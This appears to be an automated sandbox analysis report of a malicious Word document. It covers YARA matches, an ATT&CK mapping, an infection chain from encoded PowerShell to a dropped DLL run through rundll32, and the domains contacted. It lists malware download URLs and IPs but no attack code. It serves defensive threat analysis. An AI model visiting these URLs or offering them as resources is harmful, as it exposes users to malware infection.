                      Source: Yara matchFile source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 17.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.310000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.4b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.310000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.680000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information31LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncSystem Information Discovery15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344134 Sample: N00048481397007.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 11 other signatures 2->58 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 24 2->17         started        process3 signatures4 66 Suspicious powershell command line found 14->66 68 Very long command line found 14->68 70 Encrypted powershell cmdline option found 14->70 19 powershell.exe 16 11 14->19         started        23 msg.exe 14->23         started        process5 dnsIp6 46 traumfrauen-ukraine.de 212.227.200.73, 443, 49168, 49169 ONEANDONE-ASBrauerstrasse48DE Germany 19->46 48 e-wdesign.eu 45.138.97.75, 49167, 80 M247GB Germany 19->48 50 3 other IPs or domains 19->50 44 C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll, data 19->44 dropped 25 rundll32.exe 19->25         started        file7 process8 process9 27 rundll32.exe 25->27         started        process10 29 rundll32.exe 2 27->29         started        signatures11 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->64 32 rundll32.exe 29->32         started        process12 process13 34 rundll32.exe 1 32->34         started        signatures14 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->60 37 rundll32.exe 34->37         started        process15 process16 39 rundll32.exe 1 37->39         started        signatures17 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->62 42 rundll32.exe 39->42         started        process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      N00048481397007.doc16%VirustotalBrowse
                      N00048481397007.doc9%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      17.2.rundll32.exe.370000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1ff0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.1ff0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.410000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.360000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.5d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      20.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shop.nowfal.dev7%VirustotalBrowse
                      traumfrauen-ukraine.de5%VirustotalBrowse
                      e-wdesign.eu6%VirustotalBrowse
                      nightlifemumbai.club5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.a-cert.at0E0%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.e-me.lv/repository00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://www.acabogacia.org/doc00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://nightlifemumbai.club/x/0wBD3/100%Avira URL Cloudmalware
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://nightlifemumbai.club0%Avira URL Cloudsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://www.chambersign.org10%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                      https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P0%Avira URL Cloudsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                      https://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://traumfrauen-ukraine.de/bin/JyeS/0%Avira URL Cloudsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.globaltrust.info0=0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://www.valicert.10%Avira URL Cloudsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      https://shop.nowfal.dev/wp-includes/RlMObf2j0/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com0/0%Avira URL Cloudsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shop.nowfal.dev
                      		104.21.88.166
                      		truetrueunknown
                      traumfrauen-ukraine.de
                      		212.227.200.73
                      		truetrueunknown
                      e-wdesign.eu
                      		45.138.97.75
                      		truetrueunknown
                      nightlifemumbai.club
                      		172.217.6.174
                      		truetrueunknown
                      jflmktg.wpcomstaging.com
                      		192.0.78.20
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://nightlifemumbai.club/x/0wBD3/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://traumfrauen-ukraine.de/bin/JyeS/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://e-wdesign.eu/wp-content/bn1IgDejh/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.a-cert.at0Epowershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.e-me.lv/repository0powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.acabogacia.org/doc0powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000005.00000003.2085953341.000000001D380000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.certifikat.dk/repository0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://nightlifemumbai.clubpowershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.chambersign.org1powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://repository.swisssign.com/0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          		high
                          https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/Ppowershell.exe, 00000005.00000002.2088409588.0000000002F52000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.ssc.lt/root-c/cacrl.crl0powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000005.00000002.2096237563.000000001D301000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.certplus.com/CRL/class2.crl0powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sk.ee/cps/0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.globaltrust.info0=powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2096618257.000000001D4B0000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.valicert.1powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.ssc.lt/cps03powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://shop.nowfal.dev/wp-includes/RlMObf2j0/powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://ocsp.sectigo.com0/powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpfalse
                            		high
                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
